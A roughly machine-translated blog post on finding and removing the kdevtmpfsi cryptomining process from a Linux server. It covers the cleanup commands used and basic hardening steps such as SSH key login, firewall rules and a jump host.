Symptoms
Server CPU resource usage has been in a state of 100%, by top
command look and found a suspicious process kdevtmpfsi
. By google search and found that the virus is mining.
Investigation methods
首先
: View kdevtmpfsi
the process, use the ps -ef | grep kdevtmpfsi
command to view, see below.
PS: By
ps -ef
the command to detectkdevtmpfsi
process number, directly kill -9 process ID and delete the / tmp / kdevtmpfsi executable file. But the process has not had one minute to run, then you can think of,kdevtmpfsi
there are daemons or planned tasks. Bycrontab -l
suspicious scheduled tasks view.
第二步
: According to the results of the above known kdevtmpfsi
process ID 10393
, using systemctl status 10393
found kdevtmpfsi
there daemon, see below.
第三步
: Kill off kdevtmpfsi daemon kill -9 30903 30904
, and then killall -9 kdevtmpfsi
mining the virus, and finally delete kdevtmpfsi execution of the program rm -f /tmp/kdevtmpfsi
.
Post-mortem
- By
find / -name "*kdevtmpfsi*"
searching whether there kdevtmpfsi file command - Linux ssh login to view the audit logs.
Centos
AndRedHat
audit logs path/var/log/secure
,Ubuntu
andDebian
audit logs path/var/log/auth.log
. - Check whether there is suspicious task crontab scheduled tasks
Late protection
- Enable
ssh公钥登陆
, disable password. 云主机
: Improving security policy, inlet flow is generally only open port 80443 on the line, can not restrict the outlet flow default, if there is a need to limit as required.物理机
: Can硬件防火墙
or机器上iptables
to open the entrance traffic rules.- This machine is not directly required to provide services, can refuse entrance to all traffic outside the LAN, through
jumper
the machine landed network business machine. - It will have the ability to build security scanning services, regularly check the machine for vulnerabilities and fixes.
小结
: Several measures mentioned above, incomplete. Here are just initiate results, additional measures need to combine their own business situation, otherwise the air.
This article from the YP station released!